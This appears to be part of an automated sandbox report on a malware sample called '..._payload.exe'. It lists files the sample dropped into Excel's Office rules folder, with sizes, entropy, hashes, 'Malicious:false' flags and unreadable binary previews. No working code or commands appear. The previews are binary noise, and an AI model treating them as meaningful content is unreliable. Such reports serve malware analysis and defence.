                                                                                                                          MD5:D43AB2680F70B7E5A57C8CD44529BF05
                                                                                                                          SHA1:9D95D5139240A72378A1389D68A82E842ECBFB66
                                                                                                                          SHA-256:0A3DCE5CA65559536FE3D2C985704CE4D1147574A41759B46092C6C67D3E1053
                                                                                                                          SHA-512:6174CB7FE7B8E97871016C8BD197EEA347507BC815D9239C033215072DFACE48617DDB27DA2CA8E24402FA0E03420B56514FB537FA1E1FD48D1A42B5CCADC664
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlM.oGBH..n%h].&..7J...w..Lf.o........ ....S..m..(lp#Sb.Z..0...G......EZ.:..'>..]J.....T&....S......dH......._..(.l5J.a...I..Z(%...&.<....>...".N.=..V."T.N....>k.....,....6.Cg).../.v>..:....y.0...A[.v.9..8..s....G .d.8~....s...s.Z.E....?....s.<../...-..v.t...b.{......wK...........j.C+.7.AO..........;..Q.3.O..pu.MUb*{.!Z........P..w:..*.L......8.4.s.....K...0.V....w..<...QB..(.H...D.@.#...F...@Kze.......1.H0..PE..{q...3."..Jf;....V.E...".l.z..6.>q)......^.|.S...<.Cwo'.p.........9..G&95w.xen.'...-.,$8..Aq..+..s..=.>..E.....D$.:.T1O..-............/.6..ou.K..N.&..N..>t...z..x.p..J...-H\..(...]((....F....X.....$.....G.3...d.[..w.65..)n..C.gS.+u...d.m..O.c.B._..[...qL}..m....}.6....xp..._..D.A..z...i.Hg.*P$...]....l..;.^.6/|....*.}.s.9.x...Bu.r....)e.>.g..V...A..:.T.G.O.Nx...d.i&..d.S.y...k..pZsmAaf,W..[...p.M.q+...u0DU......*....<.......z.l.....ad........I.2....b"./*..k..Z........vU. ...=.F.:n.I..C.O...<.&....r..dA........YB@.`M6..E"p.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490024v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):871
                                                                                                                          Entropy (8bit):7.750996773077385
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:IeAhJtGrKMbf3RS0lwC2ZiiifGpuyEGbD:KhJUr1T3RS/hilVyEUD
                                                                                                                          MD5:F2FBBA274DADBD1C3FFB327CD8FEFDCE
                                                                                                                          SHA1:42A9C64560B95DC95277B50BD5E29C59002570A5
                                                                                                                          SHA-256:D6E8F3D9033A109DB77552C4436C3AB3D6ACBEC42E098783A5BC4AADB23511DE
                                                                                                                          SHA-512:A29F7DAA4B45FEF0BB4095DB2F5E5F19E52361A7B8702DE98285B6E05398A8B8B38A806AA7231DD95D82750CAC1146CE43B14E0731CD7B3F5A77C2C074BB0BFF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlfW...N...+.2.b\P8...=.cig.Rm}.B./e8....&F}.....2$h........8x...v4..|.a."x...f.2......=....M..@V./....'.#E."..Ht..x.R`j.... Vm..8..13...s...l.t.."...P.....\.`..).7.`_...O..v...8./..g.yJ.....^.a......tw........d..E....w...~......g.`;%.Z=r...f.v......'.}%..T.tM.jP.a....9.z.\.mARt......N.}..z.t(.iJlr.*/m.*y..4.D....v7"gw......b.}......!.*kUMj.PeJ.......uH...=.]..*.L.....[8..<.......S....\....._...P..2..6,h....=P......=.~..E..R:.....K....i-=.d.g..Dft.b....I.7..'.....rUR....n...8PX.W.6.".....qo......Y..R/.Q..._d.z.;...3.j..:...zvw..!.]`..9...7.?d.x.Q.W.c......=(... ..eG...=..XP.\H.%....t........'.../.Y..^.w.R.,z:.t4.{......X_.U......p8"6a..xfE..H.m....E..P.~.q.E.I.>..&/#CL...*x.?"...E.b..nD)h.8..w..(........../...I.w.%...v.t....Dp....h]..i...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490025v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):866
                                                                                                                          Entropy (8bit):7.757980474511926
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:guF8KC4n8mM6hbgEt+utWGgxLpOZgpQhTAVNzYSIj4bD:guF8KCVstngzZ+TAijiD
                                                                                                                          MD5:FC171102A30D77E96951E29C766B7AB0
                                                                                                                          SHA1:188AB7193B4E0C5C47694F288AC5876CF8CBC4ED
                                                                                                                          SHA-256:6C220978AA7EBD1FD5EA73EE65AFAECD7DFA56240D0CD636401F7558336C9039
                                                                                                                          SHA-512:676CD2C5CF2A78D298B44BD8014C4F693EDD8087A4DC522C655ABF9DAB55DE66212A9C311BEA45F95C0BB00BF815E4113D7238006F119BA5EE9B45D7F3ABA85E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml]X....o......O*..To...?..`..<..,.x....A...>..4...i....k.H..-W..Q..gx..F.l....<]....e..4..%.o.;..m....a.Od...C{=~..<8y...K.......`........K.>.QRG......NqS..HU..6...&+..[......WN.H.].sx.ZY.........HX.?ug.A..".,....P.../..Tt.{........]n/.y..?nj1.HyO.P.. ...8.h.>?%.q|:.;.8...1........uJ.....*..4o. {.Xtv;.*....D'(r.ST._..p.".5........TP%....&....M...to.E..T<.D...{e....22XW{.MT.n...\V.6s.5...bnQ..LXR.9...r.@....._..i+p.@J.2.$......v.]b.....$e.1^..N..Y...8aog..@...q....u...v..+.Ucd.q..o.61.....6DE..Dot.....q..%*.g.....F...;./..9.D...>.,.*..Q.8:......m*.x$..=i......G.y.|...Ww}<...yyG....L..1./.cbi.v.......G.K.........~/S..~....Z#..&./.q$KN.f.E.OqN.....*...p...@.I..I..;|b....?...k9....1v..`...7..E.l..2...Q..M.^.C'..f.....T...G.....4"..=1V..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490027v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):860
                                                                                                                          Entropy (8bit):7.757149855279063
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:6J9jvI1av5fJQmlh+2vTcH1Vw4jf5Jg5oMwDobD:+9rIoBfJTlhBvTU7//WoMzD
                                                                                                                          MD5:7E0C0DFA14CEDAA919E9BCD4E0F1D07A
                                                                                                                          SHA1:228CD01DBC397583F76FF4933EE2602BC199EB63
                                                                                                                          SHA-256:E3C9ED95355FA5D645B25B6E4570B4E82D56EA4CDCFA234FEF2A91B71F87F1AD
                                                                                                                          SHA-512:C08F28781B535A0F36C6F8D4E0F879716D93ADC24BF119BFAFB1ABF5BA7048B7D37F5B7ABA5F0159075014E325373324C100DD618026096B9E0A118BC885A270
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.6.\.}`.^.G..F.s.'>....O/SW.l..O{..A..i..L.F..$-..C...F.."=........%R%....Z......Q..,t,MU.vE.K......yP.HC.Q.6+.`.....G=.".(.......o...v...;.D..8.'K..c.`.:...*..=.w..vI*1H......J.+.s.{iJ........F.D".]..5&...r...n....hg.3.r.....-...R..-...........y....9.....h.....D.T....q.2j.<==y.qy;....T....Q3....s.^.....>P.r..,.g<.g....+.Q..a.u.(..muN6.c.."t...?...4......c.....F..,.uQd...bD.......}5...Q..'..@..,$.)....L.W...U...]..S..Wy..-V}.G.....c.H.x0.d..1f..:.?..:..~..P..L...... .8..Gr.....,.c.L...ZJ.....k.7b....S`._i...$..ooNx.&..~.!@.q....N..H8.,.t...Z:.v..v..FX..v).t....L....9....U..Y+ .3. H../...G.ut'.w..!.r.!...m.....]7. [\...F.`...w6...|.._....'.xgT...p&.k..~a....{7..OJ.k..mj&..-y........Y:a...i..+.Y.S.%......%[..@..Bt.H..&..+...59/7.....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490028v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1057
                                                                                                                          Entropy (8bit):7.7673850093233785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:JOgPVdMZly4ZF+EFyyuped/HfgXYNaG4eI2ZMdEMWesM7rDYW+bD:s6VclbZF+OiAWsaG4WZGEMWS7wD
                                                                                                                          MD5:12F5F2708FCA5FE6716C0EB02488DCDA
                                                                                                                          SHA1:2CFB8D278C022CB33282DBDD2A8363E353CA3197
                                                                                                                          SHA-256:02F59D40713548C637FD7E5F0F72860839D268395F0380DADFD30C6F267EE22A
                                                                                                                          SHA-512:2415FDEC8E701E7B09AF388215BA161668F34A239FD1D088345E0118653112E3574B8A1954720F800206888FE55471A6CE8F3B06CDC66978F2E480FFAB7D6E4A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...+....No..Be.....z....5........e.1.@......v.$\.8.C.lx.'<.4]....0...B._.XJ88!.u...!d.p...9...r.:.i.ah..n.O.|..!."y.(k8.?*....Vz..I.c..t.h.3U...o.5..E!..A..aT...i..pj.c......db..L.Z"7.....wGg;.<.........8..WW.s..J6.+......r..Z..~2......Ub.8..w&+.g....a;.0.....6.T.%.C...W.5..?...(~S:.2...L.......VB....%..Pt.].<.......n}&.6t....^.J.yZ..[.VI.t..)......k..!.uUf...o-8j.?Bt.^.%.Q*{...ck.mv.....p\\..Y....J~f.Q.FD..H..1..X... ^..b.H..pW.{........B@k.!....H...;._.c..k.;..4.:.../..g.y...]. ....6...l...sV........v...Mp.....a!]Np...E;=\.5.H.*.{T...~...HS..&n.`....].LS...^VNh%.i..l)...s....w..%p.......m...Sp.Da.....R..p...[..;..K.8.c......_DE"..1..)l.3b.....Dm...r&`Ix..S..[.+i.O..m...g.4.." J*..&\C@..pu.G..d..!..B.W..DE....\".......|.z.z....].r"..Gu&..-k.....2.....C.1.....n..i...-C..$[.n..$...[..J.1V..C.[..uAC.......b.U.3....|.>V+D.3.+..w.;;.S<Y..o.u..u.E.\.uG.N..:a_.......(...YjdD...&....E..pl>.a."....7..)s..6...#..%.......iT.KJ.phJtdHo970vyx7vwlYG00

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490029v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):766
                                                                                                                          Entropy (8bit):7.679513238797054
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:zH12QNpYWQ4Vf5zHKJIG/JhB6y29lZcUJNUikrHcp77HtEWA6d50XN8xYwJqjf4q:R2LWt5sR6y29lqUJSikrKXHtE16j0uxI
                                                                                                                          MD5:3A5911DE514D0EA3BC693A3635E0D639
                                                                                                                          SHA1:AD441F0755E7785981E824BE82EE762A072352D7
                                                                                                                          SHA-256:D1261305C5667A1940848158CBD552913BCAD46B42C020B7D76382CCB27716BA
                                                                                                                          SHA-512:1650743BF6ADD12033C95AB17E51B8E6B8F8615CCB8986268E9DCD1D3EF147B0C20D913F842C5E9C42DABD53CAB460471E7F723F5AA2F6C3F8A54AE3C0AB9F7B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..7.1i.r)..F..Sm.:iJ..,. .?......R.....YHj.H,&...V..t.R......=.v..j.&!...........f...t.'.7...Q.F...R.z.....!7.&.m0....Zk.a.F.}.Z4Lx.ye@.....B#I.Nl.R..BL...R.|}]M!+..a<.T..v..U.e...pp.........P.Z.R....w.5`........~.I...f.Syo..l"#)$.#......d.MT...4@T..'.......y...(J...K.....RV..U=.i......pBw..)U.....V.o"b.J{...~.l.Yx.a.p...Z...O.m.U.7|...)....lB.L.......b I....q).... 4.'..M.9..e.....m..^......E.*.0VZ.A.......D.z.W...%......>7....Z.Z..........^k."...m..[kn.=...q.Q...[.X38...'....vuk..x.......p4U...K..C.P...mJ..pj."Hn.z..24eP..q\.A6.B.e..:....=..eN..lk&..`. h.G-x^.(...v..U.....p...u....-.zl....9.........?R..^..e....D......Q......>.). .o]..'.t./....ZphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490030v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1037
                                                                                                                          Entropy (8bit):7.794132402372516
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:497SYJ3FM8SCNjKru2ychEAydpdSf37r3fxbD:WjtFMXC2u2tE8LrvhD
                                                                                                                          MD5:B7C355FC74AE72EE31A4BA6D82088005
                                                                                                                          SHA1:A53ECCC0D753BDE486E00196A6C74E0A4776813E
                                                                                                                          SHA-256:6AAEB8606C47CA0F2AD60800224D0D08EC2C2501AF3C9F65AE7BF8102B7E01CC
                                                                                                                          SHA-512:64FA3D4067303FFE837894F485D64286AA3C7398F5984CDC53994987F0F15A5EA7037064D844647A15E2BEE4A4531B28B2B746B003EED188266D884AE92C8C9E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml........_r...5.....4dNs.!....O.|.!.q..?..I../.......!..V#.6.B.&.MQ4..ez.(.S..2.B.....#..#..aK6^n.0.;......+G.eT1.....N..o4&...(.......yb.o.6...6@..q.....d(..M.h..:k...G....@U......)lr.'1..ihK6..D.w.@|.T...k..!..N.2....n,..=.#..j].$.......k?.y..W...n.`..V.*.b.C.}.93.R.;..#.1..(..]_..q....G.a.X.E2TWA.o...h.....n.y.....x...@e...kH.v...3y.)....j2.....A7.Y..+Nx9@...E.E.w..).._.Z^..1...".zYv..s<.B._.<...[B..)1..e.. ..w........h..p.N...;..7.[....[V.D.S.z..g...S.]J..~.N=...........].>FUC.6.J.i.q.....Mc......;.&..u|:._..bg....%k._.....%D.^..#.u..r`..6..)..T.k.^.OE.t...S..["...P..W...[.....~.....&-.xw..1..Ae;..#...X*........A62.^.:ST[..ex.....Y...+...4mL|.....:P...H...@r..&.cx.s4 .E...s..u.......8...nx.._..Vlw..]..c.Ld...Y+..{1....U"Mg./Y.7...Yz...9.v+.GW.....S.j.....}...UO.....F..x..K^.&...z*.4X]L8..x.jA.}..$...0.`..Cz.?..n.#p..n..T+.........S.mz....xV.....,..N...:.}a..5.D./...c.22%..L.......!4k.U.]...-.l..E.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490031v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):920
                                                                                                                          Entropy (8bit):7.7823143529122785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:gDfUFE/eUvkGWQrmvN6AH6OS92NnPy4toA7PbD:gDfUFE/f8NQSF6y612vtoA7TD
                                                                                                                          MD5:F5C9D88161499102A05007A362C9B629
                                                                                                                          SHA1:07105CF28D824B0E06DC379EEA8E04899487F8DC
                                                                                                                          SHA-256:49FEB7ED92A4E6E16DE11CFF605A2A2F106ED84C37798F7B2C03F40791C68EF5
                                                                                                                          SHA-512:EDA336755E6F97FA3ED2699D39847915BDC6F9C17A3712F233263C7E63F0767F42524A475FD767CDE0F580F0965C38CB2A19412BCC47C697A229D894FE7B03CC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..VM.(+.P.9.VU.u....5&g...#.O.1.K..........>.E~.+=...?.j~B\8.P.B(B&..j.S...|n..oFW.....y\..5P:..g..fy...rg]!......'.....@.....I.^......7`..j.$.j...q..k..X..T..W$.$3..T.K...m.gj...........^.:LxZ.h.....l\..=6Y..@...k.a....o.WN-.].....v.H8u./M4...u..g.....D.k.F?.....sd.7.=.....U....!o.l.].Z..P.K....t...R,+|....E/0...j.N~yM......`..y.'..~eO..~=.........2.`.$.k.4...~.7VH......SF....;.A\..f5.ow.6.K....[Xc............!.L...m..8.._<SsJ.BP.9..R...oe..^S..?...!.yx.O{CgX..w~......rQ.s.B.b...D...BH.1].~........F.$".........]?...8..e...*..l..l..s7....p&or.t.]PEsC}.=X.2~...Z...g....."......j..uC}Y./...x..U.....w..go...(.i*QQ..T.@..e.?t.'..".N^...JH..8..#..4.S. .N.|..k5.G.f..9....$...0..'.J......~.....G.C.....|....V+HH....:..A....b..e^m..+.Sbt.f..;{.Yji2IKJJ.xld&.2..o....."... .CG..{..a..F.[.DO.9.'..)phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500000v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1147
                                                                                                                          Entropy (8bit):7.822992310587361
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:trhwG/8b/LkK0IQXFsGbtgJI0HtZk0aahhnunxlxbD:ftkb/QK0IQXbtgJrvkOrnuxfD
                                                                                                                          MD5:B77004B96736678F81FDDF3F62A7A705
                                                                                                                          SHA1:A98F817D2C93878903C860C25C86E86913E29FDB
                                                                                                                          SHA-256:552F4E713EF489379C107E1FC8FA085F791673840372900575FECA923AA66FEE
                                                                                                                          SHA-512:6CBE87D791BF95E2722702E391FBBEE7DAD868B4FCB64E933AA11B438682111FADAA8351CF9F41CEE2C3AD9E45B0CB484CD82D1E7C273CE849FEA8E1F9225FC7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...D.`Yb.......L.<.L...q.Fd.`.`.+..D.Ao......s..4j.....1Q.....\.y...W..v.....C..5j.zg.,....4.j..X...y.H?pf....v...6.|.t.u..^..........=|...z........9.^/D.E=B(...K....B.2...c.8.n...y....c..f..I.?..H.1.|..>........s.[qM...!e[....|D$=*6...X.O..L.o..}DrZfh..+*8'Q}n.......L.M...jap,a:k...23...<k....p..S........<K'..d...nQ3#.x0'....j.E.\..|O.=>...B..1.ski^.+.J.;.9..z!..P&.Y..j......y...3..\X..q...........J.i...<+...=.+.\2q.....n.<..n.h.....F*RIf..$5Y....u...x...'. k,ay..PF.....3i....C9..........6...P..w.F...D....I...U...X.*....:..Qk.m....@.l*.00..*F..............;...)..3./.......5I.Tr..&.{...Xa.d..S..\...i..l....M.l.<8.cW=.E.Q..Z.....G....?:&?.ECB.P.?.f.TTft.5.H.Vq..g8...E...G.*s...%.b+f.ZC......._.%.N.....7+cJ...bJ.1.p4i....<q.o9.w..._.+.....(...N.........."wR.>.*..8..{.D8.c. .h..5..vCm...>..%.}......;..".....u.w({..)..P..$.....nQ..$....Hgh.!......@....d,.....I..,.E%.8.=...]..}..i....H{.T.i6..&M..O....=v..?x......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500001v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1141
                                                                                                                          Entropy (8bit):7.788273673511748
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:m0I2412Q4OTJ657IESYtyaOAUOeQJSEAa6OGRYqyPnFE8kF+bD:mX27555tyaOfO9JSEr6f5yPnFlkF8D
                                                                                                                          MD5:B5E6BCB6DC1C2355FEE587A673C819FF
                                                                                                                          SHA1:9CE759B8A088538AB580D9CF2E8FE148E34C76DC
                                                                                                                          SHA-256:52159420AAA0458772BA879401D65A9BB7DC9BA2BFF64EE1A05C588B5C0351F6
                                                                                                                          SHA-512:5305076F5C95393AF574FE227E648C78A0EB640223CA7315333199BE3EAD59D7BC67D2F2DFDBB245FA61B339E8B8A56DF134EE01E32E0CB3BF0717DABEC3299C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....se.............K._c.B.^,...+B.e....../..'.....A...6.na......#....G..]).71W..v.96].T.3. ..t.s.;..}V..o....Z......@..Y.t..]T%....[/....G.........r.....O..s.....q.!.....ZC.l....E.H.....+...LB..W:4..n.e......yQ..J)....J.?......L/myz\&.p...UYw..wL..s._......F.6'.Ya....{.){t...K...f.p.{...K..a..).l.c....z.LG".......U....%.j..$....C...s....X=.a4...Ddm%..n..3}&.!.E.=cE.I"........l..=h..50.U..!...+...B..P73_QM.....8B...`.Y..g].z..q.>^..K..ZR..S.D..J."./=>.......w.....l../z.==3.Ut............43.......".K7,.X...JL60y.c..#.Z...."..qh+wq4.w.t. uX...`..,o........0.8.&..1_.3a-X....n...zK...F....\.'08.f.\m$..S4.d....oB.&xw.D.M...9v&...U.v...Q.v......?m4...2...Y..[@y'?...pu_\....y.-.L.27.c..T.Q=..|.\.&.K1.z........lL#.(U.....w8.8...kv.b..v..7..WrE.M.JF....!.!.DcF.....dJ.m....T.....k.P.['?....w.by.@...7.B.Eh...c(r...D.".U..fH&...d.....7:&h.o.O6...=9..f.......`...{.C..2.*..r.o*..;...0..34[...4s%.`;.p8.a...:&....H.9....:D]....]}@E.y..T.@......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500002v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1145
                                                                                                                          Entropy (8bit):7.807064111911779
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1TzeG+E+2jqUGXhJ18EYFGOZhzx0MDGnZpzbVB12myGbD:1+hMeUUX1/4GOZlGMaHNB12pUD
                                                                                                                          MD5:8D401DF224EA54A3962DF54DDF99E8DE
                                                                                                                          SHA1:B3E9CBD20651B663699DAD4E3B758D4951DA3100
                                                                                                                          SHA-256:4052C635EC18C5B02D6D3A64DA4B6BE4A88A388077C842834506558476371572
                                                                                                                          SHA-512:BBFFF35848590D220E07D1A3477BBD17FC26737825AAD47064D3B57B9C2C58F4770D04BC744486990EC2C88991C53DFC22622B3D65B1FA8086C2CD2D58AD6C3D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml0m.D./..d....Ni.<4m..gtse..!..Y... ..Z...@j... .VIP..../..a.....=.R..?.g..6;......Xi.(.^.$......^.......T.;.M.n.;.v..L...v....u.|.<..}..~....+.u^..:"X.?X.7.....]$.sm. X.J.Ue*...]].K....).6T....k........s.]...z.su....L...\....2T...[..y.4.jm.$}.,+..9.X..o..A.aW.P...j=...$...b..2 df(..Mj..3.Og..g..Z.9..Y....;~:. .j#[!.ce..s.|.A`...c..d..20_Z..[..""...={k.!...#..q...*.P-.RB+/..r?..w..&.........kQ.c...m..^Q..3.g0.I.$r.......j.Z.....7iW..L"p.kD.bM...~CC~C..?F..u......l..:...ns.........U.z!..ao.6)h..YS......=.A_..@.cZ>O...N.+l..N.. .h...}.p.$.....gn.Q.eg..F..z|.w*..e76Q...i.mQ.X.1>..Fp.d.2.....2.13..Ez.Eo. .[..u..k..f.d%..n.R.........{E....;......Zg`..........6."7.......dr.4....G.pL.o4Z.).|...}....~.;.5......<w.~.$.uK.....h....I.OQ.XH*!...ih.r.U.W.....!.H...Z.o^\..G."............' r.']._@O....H...a.......<.GUN.L...X..H...B.Z.....d....5..R,...k...Y...%.$.....#.5iCt.rEc.."......B.l.]..V..m*...Z..C..|z.......Bg.W.....p.2xl...l"...B.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500003v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1145
                                                                                                                          Entropy (8bit):7.8427189200426515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:dH5XoIzz1TUZcPQTOHnsFD6Nz4CWLAofCgGz6X0zJwFbD:dH6wz1ASPQTOHsRcIfCX+0GVD
                                                                                                                          MD5:60383AEE704EF56C095E604F0EF7AA6C
                                                                                                                          SHA1:6867796651AFE6520752FFE7C7EEF9E3C9F2F1D4
                                                                                                                          SHA-256:FBBD9E6BEB2D8D557262B4F2C31FA857E3DA5726CBB1AC5BB1AB201F5E709A31
                                                                                                                          SHA-512:1F61734672D14851F11F1379B27CEC9692E9FF2A0F3C1D44DC27BD33E0F8DD63595F2378313E8121948AA3F16F9B4AB4D834E0217EAB49C293312CA385F18C64
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....." l...y.v.J...`.U.Y..&..3..G...D..4..V^.. ...<.gt.....(t..P.....}.z2..g:....'S!v.l..m.S...X3O...&<)0..8..?.....5..".~W.......z...>..I....5....[+.a....*/q...O.d~......:...,.*,.1....i.).[;.C..b1..M.l.r.. !....4.}8....v..m.V..2.}.....a'...P...Y..w....B+.4.u>.Q..........U.'.3..~.\.X.......yg+.!d........{..U..{V..c.M.ia[3\..1TU.}.;.......+..I........IEu....K=l.z".==..<\.!f.....*.P^...!.....K$M.i.....W..q..s..!0..n.U.;..X...i......y..mQ.~......#H./..b&..1`.......is..b.!......".....jl....\.g..........j.Xg`.....h/v....v.\'.....F...h....`..C..n..F......%5=O.'..O....7." a.....d...r.s...........?,....&..`w9..b*...4I.8.j.....O.......J .H&...7f..[./..."9FdK.x..+Y:K.Xx...;.f.K1=R.Ie.c.5v.....jR.sH7..2...4..2?.).w.&a....y.n%.g.......U..V.]..a.4.[V.}-.7!e.z.bey...kO.".. .N.".........>i.^F...)......ol..TE.SLL.-.....Q.8..R..*2..!...X..rI.(......e..7..`2..X....1..~.K.c(....Iu....3.U.]..Y5...d.H..9.%.of.....T8..q....W...ot..B..C....~^.Pt.;K

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500004v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1145
                                                                                                                          Entropy (8bit):7.828482754654243
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:MaIfECPKUE28lOFADBIit4ogR5BIvA7W87XPIqwbb/bD:PIZt6vt4R5BQOtfILbbjD
                                                                                                                          MD5:E588068D627D85798AE14B3CBFAC523A
                                                                                                                          SHA1:6D8073C02669996B5F3501B53A7F6D25FFB18543
                                                                                                                          SHA-256:C6F2A049A54E0CC3D7531F571081DDD3F94109B2F7CE6AF7515C6C53ED6FE488
                                                                                                                          SHA-512:8102DEEE1E4C152BA53D2D0C9A400DE5D7129066340277E41D5918B396A71685205AAB0B41F4F156F2BF24554EC172E4D61A1FFE075F2BDF0B69DAA1A72C9556
                                                                                                                          Malicious:false
